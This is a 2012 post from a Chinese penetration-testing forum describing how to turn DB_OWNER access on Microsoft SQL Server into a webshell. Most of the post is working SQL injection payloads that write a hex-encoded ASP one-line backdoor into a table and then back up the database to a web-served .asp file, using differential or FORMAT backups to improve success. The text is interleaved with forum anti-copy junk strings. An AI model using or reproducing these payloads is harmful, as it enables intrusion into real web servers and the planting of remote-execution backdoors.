中国网络渗透测试联盟
标题:
DB_OWNER权限得到webshell的改进办法
[打印本页]
作者:
admin
时间:
2012-11-9 21:31
标题:
DB_OWNER权限得到webshell的改进办法
DB_OWNER权限得到webshell的两点改进:
- ? E7 y1 r: g+ J! Q
, o7 K: B" R9 `8 w, b
减少备份文件大小,得到可执行的webshell成功率提高不少
' e! l* [" X+ p' Z
一利用差异备份
+ X6 F: q0 x+ c2 w
加一个参数WITH DIFFERENTIAL
' N9 q4 t1 L+ w: v/ W
- B4 ^: ~ D' \2 h/ [
1
2 h4 z# s1 x# j
2
- r0 Q! v# L+ X& p: p! I$ \ r& X
3
. _5 w2 n) S% o" e% ?
4
0 h1 L0 V. Q0 Q9 h
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
$ _- U8 W- `4 s. c
create table [dbo].[xiaolu] ([cmd] [image]);
1 }/ V1 L: R9 |8 C9 ^) \+ ^" {
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
+ l' F* g' V( J; G% l2 H
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
& O: @- j1 [( v( W. W
N/ p' [* w6 l
二利用完全FORMAT
* r: Z' w& K3 G
加一个参数WITH FROMAT
: H( P4 ]1 o# m$ r6 m0 K
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
; ^ g0 L" o0 [* z4 O
" Z! i/ ~! `7 M- @+ z
1
- b$ _# y" d5 n+ R
2
9 j8 c3 }; L# f7 Y3 t) o8 ?5 l
3
. C& T D) A3 Z3 }4 o( D
4
- p7 @. Z3 g% W3 f
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
' R, O$ D* U" z7 c
create table [dbo].[xiaolu] ([cmd] [image]);
) ]' [% D7 R$ e% M# J7 d& K
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
, y6 P" D7 b! [: s4 ?/ G& N
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
4 p; j3 u& N& G% J" m) |! P9 ]# _
( V, Z9 \- a \0 q* ]5 s
总的来说就是那么简单几句,下面以备份数据库model为例子
0 I- Z8 [9 ^" D7 t: M% R1 Z; x
1
5 O9 x! } a. \ y7 b0 C- a
5 }. e e; V1 d6 ?8 U+ d
1
3 ]( ] L0 b3 Q% F' ^: j) y
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
* b8 g! e7 B; ?3 J/ I5 }6 I
' X2 Q j. m1 s8 x. s2 j/ V
2
# ~0 a+ x" o: L2 z6 _1 h
- I& N J: B7 \. ^. T# W& [
1
3 f8 K9 M2 t) T9 |' t/ M
id=1;backup database model to disk='你的路径‘ with differential,format;--
0 K. l; X% G, I6 N
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2